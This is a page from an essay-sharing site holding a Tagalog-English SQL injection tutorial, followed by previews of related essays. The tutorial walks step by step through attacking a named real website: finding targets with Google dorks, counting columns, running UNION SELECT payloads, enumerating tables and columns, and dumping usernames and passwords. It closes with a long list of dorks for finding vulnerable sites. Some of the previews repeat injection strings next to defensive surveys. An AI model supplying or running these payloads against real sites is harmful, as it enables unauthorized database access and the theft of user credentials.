Free Essay

Sql Injection

In:

Submitted By mhayka1012
Words 1351
Pages 6
-= What is SQLi? =-

SQL Injection (aka Sql Injection or Structured Query Language Injection)

Is the first step in the entry to exploiting or hacking websites.

It is easily done and it is a great starting off point.

SQLi is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

-= PART ONE : WEBSITE ASSESSMENT =-

Bago tayo mag-simula na iexploit ang website...

Dapat alam natin exactly what we are injecting into...

Ito ang cover ng Part One para kolektain ang lahat ng inpormasyon sa site...

-= SECTION ONE : PAGHANAP NG VULNERABLE WEBSITE =-

Paghahanap ng mga vulnerable site...

Kailangan gumamit ng "dorks"...

Na ilalagay lang sa Google or pwede rin gumamit ng Exploit Scanner...

Para sa mga hindi pa familiar sa dorks...

DORKS - ay URL's ng website that are known to be vulnerable...

Sa SQL Injection ganito ang sample ng mga dorks:

Code:
-------------------------------------------------
inurl:index.php?id=
-------------------------------------------------
inurl:news.php?id=
-------------------------------------------------
inurl:category.php?id=
-------------------------------------------------
inurl:games.php?id=
-------------------------------------------------
inurl:forum.php?tid=
-------------------------------------------------
inurl:newsletter.php?id=
-------------------------------------------------
inurl:content.php?id=
Ito ang linalagay natin sa serch engine...

Dahil sa parteng ito ng dork "inurl:"...

Ang search engine nagkakaroon ng return results sa URLs that contain the same characters...

Kaya ang ibang site na may ganyan dork sa website nila...

Pwede vulnerable siya sa SQL Injection...

Umpisaan na natin! Ito ang sample target ko na site...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8
Paano itest ang site kung vulnerable siya sa SQL Injection?

Simple lang maglalagay lang tayo ng appostrophe [ ' ] sa may hulian ng numero... [ php?id=8' ]

Pwede rin ilagay ang appostrophe [ ' ] between sa equal sign [ = ] at numero... [ php?id='8 ]

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8'

After niyo malagyan ng appostrophe then ENTER...

Kapag may lumabas na Error, vulnerable ang site sa SQLi...

-= SECTION TWO : PAGTUKOY KUNG ILANG ANG BILANG NG COLUMNS =-

Para malaman kung ilan ang number ng columns...

Magkakaroon tayo ng Trial and Error dito...

Ito ang command na gagamitin "ORDER BY"...

NOTE: SQL walang pakialam kung small or capital letters ang gagamitin...

Ganito siya:

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 1-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 2-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 3-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 4-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 5-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 6-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 7-- [ NO ERROR Or Page Load Normal ]
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=8 ORDER BY 8-- [ ERROR! ]
Ibigsahin niyan mayroon pitong [ 7 ] columns...

NOTE: HUWAG KALIMUTANG LAG YAN NG DOUBLE NULL SA HULIAN NG NUMERO OR AFTER THE QUERY [ -- ]...
NAPAKAIMPORTANTE NIYAN...

-= SECTION THREE : PAGHANAP SA VULNERABLE NA COLUMN =-

Alam natin na mayroon tayo na pitong [ 7 ] columns...

So ngayon hahanapin natin kung alin diyan sa pito yung vulnerable column...

Gagawin natin gagamit tayo ng "UNION SELECT" queries...

Syempre huwag kalimutan yung double null [ -- ] sa hulian ng string....

NOTE: LAGAY NG HYPHEN [ - ] BEFORE SA NUMERO...[ php?id=-8 ]

Ganito siya:

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,2,3,4,5,6,7--

After niyo lagyan ng query may mapapansin kayo na numero...

Yung TWO [ 2 ] ang vulnerable column niya...

At ibigsahin niya talagang vulnerable ang website sa SQL Injection...

-= PART TWO : GATHERING INFORMATION =-

Sa part na ito malalaman natin ang pangalan ng Database, Current User at yung SQL version ng site...

-= SECTION ONE : PAGTUKOY SA SQL VERSION =-

Pagtukoy sa SQL version ng isang website ay talagang napaka-importante...

Dahil makikita natin dito kung version 5 or 4 siya...

Kasi kapag version 4 siya ibang method ang gagamitin natin...

SQL Injection rin siya pero tintawag itong "BLIND SQLi"...

Medyo hassle ito... [Guessing Games]

Kailangan hulaan mo yung table names niya...

NOTE: SA TUTORIAL KUNG ITO ONLY SQL VERSION 5 LANG ANG SAKOP NITO...

OK, balik na tayo sa tut...

Dahil TWO [ 2 ] yung vulnerable column nakuha natin...

Papalitan natin ang TWO [ 2 ] ng "@@VERSION" na query...

Pwede rin ganito ang ipalit niyo "VERSION()"...

Ganito siya:

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,@@VERSION,3,4,5,6,7--

Ito yung version ng SQL ng website...

Code:
-------------------------------------------------
5.1.63-cll

-= SECTION TWO : PAGHANAP NG CURRENT USER AT DATABASE =-

FOR CURRENT USER NAME:

Pagkuha ng current user...

Papalitan lang yung number [ 2 ] na column ng "USER()"..

Ganito lang ang syntax niya...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,USER(),3,4,5,6,7--
Ito ang lalabas...

FOR DATABASE NAME:

Ito naman ang syntax sa mga databases...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,group_concat(schema_name),3,4,5,6,7 from information_schema.schemata--
Pwede rin ganito yung syntax niyo...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,concat(database()),3,4,5,6,7--
Para kaunti lang yung lumabas na names ng database...

Ito ang lalabas...

-= PART THREE : THE GOOD STUFF =-

Ito na ang pinakamasayang part...

Dahil dito na natin malalam yung administrator username at password ng website...

-= SECTION ONE : PGHANAP SA TABLE NAMES =-

Paghanap naman sa table names...

Parang katulad lang sa query ng database...

May kunti nga lang nadagdag...

Ito ang Snytax niya...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,group_concat(table_name),3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()--
Ganito ang kinalabasan niya...

Usually ang mga table names like...

User(s), Admin(s), tblUser(s) and so on but it varies between sites...

Kasi diyan nakalagay yung USERNAME at PASSWORD ng ADMIN...

-= SECTION TWO : PAGHANAP SA COLUMN NAMES =-

Ganito naman ang pagkuha ng column names...

Ito ang code niya...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,group_concat(column_name),3,4,5,6,7 FROM information_schema.columns WHERE table_schema=database()--
Ito ang resulta niya...

-= SECTION THREE : DUMPING USERNAMES AND PASSWORD =-

Ay! Sa Wakas matatapos na rin tayo...

Kukunin natin dito yung mga usernames at passwords...

Ganito ang code niya...

Code:
-------------------------------------------------
http://www.evt-me.com/newsDetail.php?id=-8 UNION SELECT 1,group_concat(username,0x3a,pass,0x3a),3,4,5,6,7 from users--
Ito na siya...

In this query, "0x3a" is the hex value of a colon [ : ] which will group the usernameassword:email

for the individual users just like that...

NOTE:

Itong "username" at "pass" - galing ito sa column names na nakuha natin...

Tapos itong "users" naman - yung sa table names siya...

-= SECTION FOUR : PAGKUHA NG ADMIN PAGE =-

Dito naman gamit na lang kayo ng Admin Page Finder by Reiluke...

Download niyo na lang nakaattach na...

DORK LIST:
Code:
------------------------------------------------- trainers.php?id=
-------------------------------------------------
article.php?ID=
-------------------------------------------------
play_old.php?id=
-------------------------------------------------
declaration_more.php?decl_id=
-------------------------------------------------
Pageid=
-------------------------------------------------
games.php?id=
-------------------------------------------------
newsDetail.php?id=
-------------------------------------------------
staff_id=
-------------------------------------------------
historialeer.php?num=
-------------------------------------------------
product-item.php?id=
-------------------------------------------------
news_view.php?id=
-------------------------------------------------
humor.php?id=
-------------------------------------------------
communique_detail.php?id=
-------------------------------------------------
sem.php3?id=
-------------------------------------------------
opinions.php?id=
-------------------------------------------------
spr.php?id=
-------------------------------------------------
pages.php?id=
-------------------------------------------------
chappies.php?id=
-------------------------------------------------
prod_detail.php?id=
-------------------------------------------------
viewphoto.php?id=
-------------------------------------------------
view.php?id=
-------------------------------------------------
website.php?id=
-------------------------------------------------
hosting_info.php?id=
-------------------------------------------------
gery.php?id=
-------------------------------------------------
detail.php?ID=
-------------------------------------------------
publications.php?id=
-------------------------------------------------
Productinfo.php?id=
-------------------------------------------------
releases.php?id=
-------------------------------------------------
ray.php?id=
-------------------------------------------------
produit.php?id=
-------------------------------------------------
pop.php?id=
-------------------------------------------------
shopping.php?id=
-------------------------------------------------
productdetail.php?id=
-------------------------------------------------
post.php?id=
-------------------------------------------------
section.php?id=
-------------------------------------------------
theme.php?id=
-------------------------------------------------
page.php?id=
-------------------------------------------------
shredder-categories.php?id=
-------------------------------------------------
product_ranges_view.php?ID=
-------------------------------------------------
shop_category.php?id=
-------------------------------------------------
channel_id=
-------------------------------------------------
newsid=
-------------------------------------------------
news_display.php?getid=
-------------------------------------------------
ages.php?id=
-------------------------------------------------
clanek.php4?id=
-------------------------------------------------
review.php?id=
-------------------------------------------------
iniziativa.php?in=
-------------------------------------------------
curriculum.php?id=
-------------------------------------------------
labels.php?id=
-------------------------------------------------
ook.php?ID=
-------------------------------------------------
galeri_info.php?l=
-------------------------------------------------
tekst.php?idt=
-------------------------------------------------
newscat.php?id=
-------------------------------------------------
newsticker_info.php?idn=
-------------------------------------------------
rubrika.php?idr=
-------------------------------------------------
offer.php?idf=

SA WAKAS NATAPOS DIN...

I do not own this! =)

Similar Documents

Premium Essay

Sql Injection.

...due to a SQL injection flaw in a web application that communicate with a database. Over ten years have passed since a famous hacker coined the term “SQL injection” and it is still considered one of the major application threats. A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet. This paper aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system's underlying operating system, file system and internal network through SQL injection vulnerability in over-looked and theoretically not exploitable scenarios. This paper also discuss about the prevention from the SQL Injection, not only in ORACLE but also in PHP, C#, JAVA and other languages. INDEX ABSTRACT………………………………………………………………………………….....02 INTRODUCTION……………….…………………………….…….………………………….04 BLIND SQL INJECTION…………………………………….………………………………..05 SQL INJECTION OVERVIEW…………………………….………………………………....06 CATEGORIES OF SQL INJECTION ATTACKS…………………………………………..07 WHAT’S VULNERABLE…………………………………………………………..…………08 WHAT’S NOT VULNERABLE…………………………………………………….………….08 SQL INJECTION METHODS……………………………………….……………….……….09 SQL MANIPULATION………………………………………………………..……………….09 CODE INJECTION……………………………………………………….……………………10 FUNCTION CALL INJECTION……………………………………………………………….11 BUFFER OVERFLOWS………………………………………………………………………13 SQL INJECTION TESTING METHODOLOGY………………………………………….....14 PREVENTING SQL INJECTION...

Words: 3449 - Pages: 14

Free Essay

Sql Injection Methodology

...SQL Injection - Extracting database data from the page content up vote 4 down vote favorite I have a question I am hoping someone could help with.. I am in the process of writing an SQL Injection tool from scratch (I am aware there are already excellent tools out there such as SQL Map, but this one has to be written from scratch). The problem I am having: When manually performing SQL injection to determine tables names or column names and so on using strings such as: www.vulnerable site.net/articles.php?id =-1 union select 1,2,group_concat(column_name),4 from information_schema.columns -- or www.vulnarable site.net/articles.php?id =-1 union select 1,2,table_name,4 from information_schema.tables -- it is easy to determine the table names/column names as you can simply look at the page and read the column names that are returned in the page content. But how can this be done in an automated way? Doing this in an automated fashion is a lot harder though because how does the tool know what on the page that is returned when the sql injection is executed are table names/column names? What would be the most reliable way to do this so the tool knows what parts of the page content to extract because they are table names/column names? for example... could I parse/search the page content for strings seperated by commas to get the table and column names that are output by the injection? Is there better more reliable ways to do it? your help with this...

Words: 940 - Pages: 4

Free Essay

Sql Injection

...SQL injection attacks pose a serious security threat to Web applications or any database-driven site: they allow attackers to obtain unrestricted access to the databases underlying the applications and to the potentially sensitive information these databases contain.These applications accept user inputs and use them to form SQL statements at runtime. During an SQL injection attack, an attacker might provide malicious SQL query segments as user input which could result in a different database request. By using SQL injection attacks, an attacker could thus obtain and/or modify confidential/sensitive information. An attacker could even use a SQL injection vulnerability as a rudimentary IP/Port scanner of the internal corporate network. Several papers in literature have proposed ways to prevent SQL injection attacks in the application layer by examining dynamic SQL query semantics at runtime. Although researchers and practitioners have proposed various methods to address the SQL injection problem, current approaches either fail to address the full scope of the problem or have limitations that prevent their use and adoption. Despite these risks an incredible number of systems on the internet are still susceptible to this form of attack.Many researchers and practitioners are familiar with only a subset of the wide range of techniques available to attackers who are trying to take advantage of SQL injection vulnerabilities. As a consequence, many solutions proposed in the literature address...

Words: 363 - Pages: 2

Premium Essay

A Survey of Sql Injection Defense Mechanisms

...A Survey of SQL Injection Defense Mechanisms Kasra Amirtahmasebi, Seyed Reza Jalalinia and Saghar Khadem Chalmers University of Technology, Sweden akasra, seyedj, saghar{@student.chalmers.se} Abstract SQL Injection Attack (SQLIA) is a prevalent method which makes it possible for the attackers to gain direct access to the database and culminates in extracting sensitive information from the firm’s database. In this survey, we have presented and analyzed six different SQL Injection prevention techniques which can be used for securing the data storage over the Internet. The survey starts by presenting Variable Normalization and will continue with AMNESIA, Prepared statements, SQL DOM, SQLrand and SQLIA prevention in stored procedures respectively. that determining whether a SQL statement is allowable or not is done by checking the existence of normalized statement in the ready-sorted allowable list. 2.1. Background Many web pages ask users to input some data and make a SQL queries to the database based on the information received from the user i.e. username and passwords. By sending crafted input a malicious user can change the SQL statement structure and execute arbitrary SQL commands on the vulnerable system. Consider the following username and password example, in order to login to the web site, the user inputs his username and password, by clicking on the submit button the following SQL query is generated: SELECT * FROM user_table WHERE user_id = ‘john’ and password...

Words: 5643 - Pages: 23

Premium Essay

Sql Injection Methodology

...SQL INJECION - TIPS & TRICKS - METHODOLOGIES ############################ # What you should look for # ############################ Try to look for pages that allow you to submit data (i.e: login page, search page, feedback, etc). Sometimes, HTML pages will use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes: <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise). ##################################################### # What if you can't find any page that takes input? # ##################################################### You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like: http://[site.com]/page.asp?id=10 ######################################## # How do you test if it is vulnerable? # ######################################## Start with a single quote trick. Input something like: hi' or 1=1-- Into login, or password, or even in the URL. Example: - Login: hi' or 1=1-- - Pass: hi' or 1=1-- or - http://[site.com]/page.asp?id=hi' or 1=1-- If you must do this with a hidden field, just...

Words: 4826 - Pages: 20

Free Essay

Sql Injection Attacks: Techniques and Protection Mechanisms

...Nikita Patel et al. / International Journal on Computer Science and Engineering (IJCSE) SQL Injection Attacks: Techniques and Protection Mechanisms Nikita Patel  Department of Info. Tech. Patel College of Science & Technology Bhopal, India Fahim Mohammed Department of Computer Science Research Scholar NIT Bhopal, India Santosh Soni  Department of Computer Science Patel College of Science & Technology Bhopal, India         Abstract--  When an internet user interacts in web environment by surfing the Net, sending electronic mail messages and participating in online forums lot of data is generated which may have user’s private information. If this information is captured by third party tools and techniques; it may cause a breach in end user privacy. In the Web environment, end user privacy is one of the most controversial legal issues. In this paper issues related to information leakage through SQL injection attacks are presented and protection mechanisms are also discussed.   Keywords: - Privacy, Security, Code Injection, SQL Injection, web application security, Malicious Code, Vulnerability. I. INTRODUCTION As the Internet is growing day by day, most of the people are not aware of security and privacy. Internet is a widespread information infrastructure; it is basically an insecure channel for exchanging information. Web security is the set of rules and measures taken against web security threats. Web privacy is the ability of hiding end user’s information...

Words: 1951 - Pages: 8

Free Essay

Sql Injection Attack

...TẤN CÔNG KIỂU SQL INJECTION TÁC HẠI VÀ PHÒNG TRÁNH Lê Đình Duy Khoa Công Nghệ Thông Tin, Trường ĐH Khoa Học Tự Nhiên Tp. HCM. Email: ldduy@fit.hcmuns.edu.vn 1. SQL Injection là gì? Khi triển khai các ứng dụng web trên Internet, nhiều người vẫn nghĩ rằng việc đảm bảo an toàn, bảo mật nhằm giảm thiểu tối đa khả năng bị tấn công từ các tin tặc chỉ đơn thuần tập trung vào các vấn đề như chọn hệ điều hành, hệ quản trị cơ sở dữ liệu, webserver sẽ chạy ứng dụng, ... mà quên mất rằng ngay cả bản thân ứng dụng chạy trên đó cũng tiềm ẩn một lỗ hổng bảo mật rất lớn. Một trong số các lỗ hổng này đó là SQL injection. Tại Việt Nam, đã qua thời kì các quản trị website lơ là việc quét virus, cập nhật các bản vá lỗi từ các phần mềm hệ thống, nhưng việc chăm sóc các lỗi của các ứng dụng lại rất ít được quan tâm. Đó là lí do tại sao trong thời gian vừa qua, không ít website tại Việt Nam bị tấn công và đa số đều là lỗi SQL injection [1]. Vậy SQL injection là gì ? SQL injection là một kĩ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu nhập trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu để "tiêm vào" (inject) và thi hành các câu lệnh SQL bất hợp pháp (không được người phát triển ứng dụng lường trước). Hậu quả của nó rất tai hại vì nó cho phép những kẻ tấn công có thể thực hiện các thao tác xóa, hiệu chỉnh, … do có toàn quyền trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy. Lỗi này thường xảy ra trên các ứng...

Words: 2132 - Pages: 9

Free Essay

Veracode State of Software Security Report

...VOLUME 5 State of Software Security Report The Intractable Problem of Insecure Software APRIL 2013 Read Our Predictions for 2013 and Beyond Dear SoSS Report Reader, As some of you may know I have spent most of my 25 year career in the IT Security industry, more specifically, I’ve been focused on application security as the use of web and mobile applications has flourished. For the past five years I have been an active participant in the preparation of the report before you today—our annual State of Software Security Report, or as we fondly refer to it at Veracode, the SoSS Report. Throughout my career I have been evangelizing the need for more secure application development practices, and with the release of each new SoSS report I find myself of two minds. The optimist in me is proud of the vast improvement in general awareness of the importance of securing the application layer. But the pessimist remains very concerned that we are not seeing the dramatic decreases in exploitable coding flaws that I expect to see with each passing year. It’s as if for each customer, development team, or application that has become more secure, there are an equal number or more that do not. While the benefits of web applications are clear to organizations, the risks to their brands, infrastructure, and their data are seemingly not as clear, despite being more apparent than ever. It’s at this point of my letter that I could mention that a cyber-Vesuvius is about to bubble over and create...

Words: 5194 - Pages: 21

Premium Essay

Identifying Potential Malicious Attacks, Threats and Vulnerabilities

...Identifying Potential Malicious Attacks, Threats and Vulnerabilities Brian Cox Strayer Univerity Professor Leonard Roden Networking Security Fundamentals May 03, 2016            Have you ever thought about the measures that you need to go through when protecting yourself from online threats and attacks? There are many different types of attacks and threats that can be carried out against networks and organizations. The attacks that could be carried out can cause serious damage to the company and range on a scale from very minimal to very severe data loss and data theft. It is important for companies to take every precaution available and have not only the best software for prevention of these attacks but stay on top of what the intruders, hackers, attackers are learning and how the technology is forming when they are deploying these systems on their servers, networks, and office computers that employees will use on a day to day basis. The computers each employee is using should come with a User Agreement and the do’s and do not’s when it comes to daily computer usage. This will enhance the security as each employee will understand what is acceptable and how to obtain maximum security of their signed computer. It is also advisable within the User Agreement to list out the things that are unacceptable such as plugging in your phone, downloading things from the internet, and other things that may seem harmless but could hurt the company if it was exploited by accident...

Words: 1622 - Pages: 7

Premium Essay

• Should Producers of Software-Based Services, Such as Atms, Be Held Liable for Economic Injuries Suffered When Their Systems Fail?

...Professional ethics includes relationships and responsibilities to customers and others who use the technology products that we develop. Honesty is a fundamental ethical value, however, some ethical problems are more subtle than the choice between honesty and dishonesty.  As technology professionals, we must have a "..good conscience in all things ... (Hebrews 13:18)" as we strive to do a thorough and careful job. But, we must recognize that, even using the best design methodologies, it is possible to produce software that is flawed.  Discuss the following: * Should producers of software-based services, such as ATMs, be held liable for economic injuries suffered when their systems fail? * Does your perspective on the level of culpability change when the development was conducted in accordance with industry best practices? * What steps, if any, can be taken to protect against potentially dangerous programming mistakes? The first question in the discussion board is interesting because there can be valid arguments made on both sides of the question. If it is found that the producer could have taken steps to avoid the economic injuries suffered from their software then they should be held liable for the damages but if the damages are no fault of their own then they should not be held liable. There was a recent case that got worldwide attention when hackers broke into Sony’s PlayStation network and stole account information from millions of customers. One article that...

Words: 703 - Pages: 3

Premium Essay

Web Application Attack Scenario

...Assignment 1: Web Application Attack Scenario (Student’s Name) (Professor’s Name) (Course Title) (Date of Submission) Introduction Web applications are nowadays serving as a company’s public face to the internet. This has created the need to identify threats and attacks directed to data servers and web applications. Hackers exploit vulnerabilities in input validation and authentication affecting the web application in order to gain illegal access and disclose sensitive data or manipulate it to their benefits. Common threats to data systems Data systems such as the web application and data servers are faced by a number of threats, some of these threats are discussed below: Spoofing: this is a situation where computer assume the identity of another and masquerading where a user assumes to be another (Cross, 2007). If the attacker manages to get high privileges, he can use this to attack the web system to insert or change the data, denial of service, or even damage the system. Scavenging: This is a threat presented by examining available data form accessible sources such as waste, network and search engines. Scavenging might identify the actual information needed by the hacker but in most cases, it is used as a way to select other threats for vulnerabilities that are well established for web systems attack. The information gathered through scavenging include, server software, type of operating system firewall and the application software. This risk highly lies at the client...

Words: 1087 - Pages: 5

Free Essay

Cyber Crime

...legitimate cards the thieves went to work targeting ATMs to withdraw cash on an enormous scale. What is truly remarkable about this “heist” was how relatively simple and straight forward the methods employed by the hackers were. This attack has come to be known as an “Unlimited Operation”. How it happened It is extremely difficulty to answer how the hackers managed to steal such an enormous sum of cash with any degree of certainty. Given the very nature of how it was stolen, to publicly reveal specifics on how the heist was accomplished could possibly leave the institutions at the mercy of further attacks. However, the overwhelming online consensus points to SQL Injection as the method most suitable for this form of cyber-attack. [2] Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS). Databases form the backbone of all financial institutions as they are responsible for recording all customer information, transactions and...

Words: 1338 - Pages: 6

Premium Essay

Physical Design and Implementation

...Physical Design and Implementation Strayer University Physical Design and Implementation SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly. SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out. Oracle database privileges are of two types, system privileges and object privileges. The system privileges grant users power to perform the specified actions system-wide, whereas the object privileges let users perform particular actions on specified database objects. Microsoft SQL Server allows individual users to create private objects in the database. The system records the owner of every user object. Users can access objects only if the owner of the object has granted them access. Administrators can define...

Words: 495 - Pages: 2

Premium Essay

Lab #3: Case Study on Pci Dss Non-Compliance: Cardsystems Solutions

...1. Did CardSystems Solutions break any federal or state laws? Yes they did because they did follw the compliance of the pci dss. 2. CardSystems Solutions claims to have hired an auditor to assess compliance with PCI DSS and other best practices for ensuring the C-I-A of privacy data for credit card transaction processing. Assuming the auditor did indeed perform a PCI DSS security compliance assessment, what is your assessment of the auditor’s findings? That he either did not do a full audit of the company just showed him part of what he needed to see to pass them so they could operate without prying eyes 3. Can CardSystems Solutions sue the auditor for not performing his or her tasks and deliverables with accuracy? Do you recommend that CardSystems Solutions pursue this avenue? No they did not and if they had credibility then yes they should sue but if they are at fault then they will be brought to trial in civil court 4. Who do you think is negligent in this case study and why? The company and the auditor because neither one did their job to the fullest extent and it cost the company 5. Do the actions of CardSystems Solutions warrant an “unfair trade practice” designation as stated by the Federal Trade Commission (FTC)? Yes it does because they did not comply with the standards that were put before them 6. What security policies do you recommend to help with monitoring, enforcing, and ensuring PCI DSS compliance? They should have had the firewalls...

Words: 559 - Pages: 3

Premium Essay

Lab 8

...Lab #8 – Assessment Worksheet Performing a Web Site and Database Attack by Exploiting Identified Vulnerabilities Course Name and Number: Student Name: Instructor Name: Lab Due Date: Overview In this lab, you performed simple tests to verify a cross-site scripting (XSS) exploit and an SQL injection attack using the Damn Vulnerable Web Application (DVWA), a tool left intentionally vulnerable to aid security professionals in learning about Web security. You used a Web browser and some simple command strings to identify the IP target host and its known vulnerabilities, and then attacked the Web application and Web server using cross-site scripting (XSS) and SQL injection to exploit the sample Web application running on that server. Lab Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a Web application and a Web server prior to production implementation? To make sure no one can penetrate your web application before you put it in a live situation. 2. What is a cross-site scripting attack? Explain in your own words. Cross-site scripting is a type of computer security vulnerability typically found in web applications that enables attacks to inject client side script into web pages viewed by others 3. What is a reflective cross-site scripting attack? A reflective attack a type of computer security vulnerability it involves the web application dynamically generating a response using...

Words: 442 - Pages: 2